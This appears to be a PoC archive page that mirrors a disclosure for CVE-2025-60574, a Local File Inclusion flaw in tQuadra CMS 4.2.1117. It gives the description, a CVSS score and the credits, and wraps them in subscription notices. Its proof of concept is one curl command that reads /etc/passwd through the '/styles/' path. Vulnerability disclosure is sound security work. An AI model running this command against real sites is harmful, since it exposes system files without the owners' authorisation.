Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1336 CNY

100%

CVE-2025-60574 PoC — tQuadra CMS 安全漏洞

Source
Associated Vulnerability
Title: tQuadra CMS 安全漏洞 (CVE-2025-60574)
Description:A Local File Inclusion (LFI) vulnerability has been identified in tQuadra CMS 4.2.1117. The issue exists in the "/styles/" path, which fails to properly sanitize user-supplied input. An attacker can exploit this by sending a crafted GET request to retrieve arbitrary files from the underlying system.
Readme
# Vulnerability Discoverers & Exploit Authors

Stefano Andreatta & Jacopo Candido Augelli

---

# CVE-2025-60574

## Vulnerability Description

A Local File Inclusion (LFI) vulnerability has been identified in tQuadra CMS 4.2.1117. The issue exists in the "/styles/" path, which fails to properly sanitize user-supplied input. An attacker can exploit this by sending a crafted GET request to retrieve arbitrary files from the underlying system.

Discoverers: Stefano Andreatta & Jacopo Candido Augelli

## CVSS 3.1 - 7.5 High

```
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
```

## Proof of Concept

```bash
curl -s https://vulnerable.site.com/styles//etc/passwd --output - | gunzip
```
![PoC.png](PoC.png)
File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →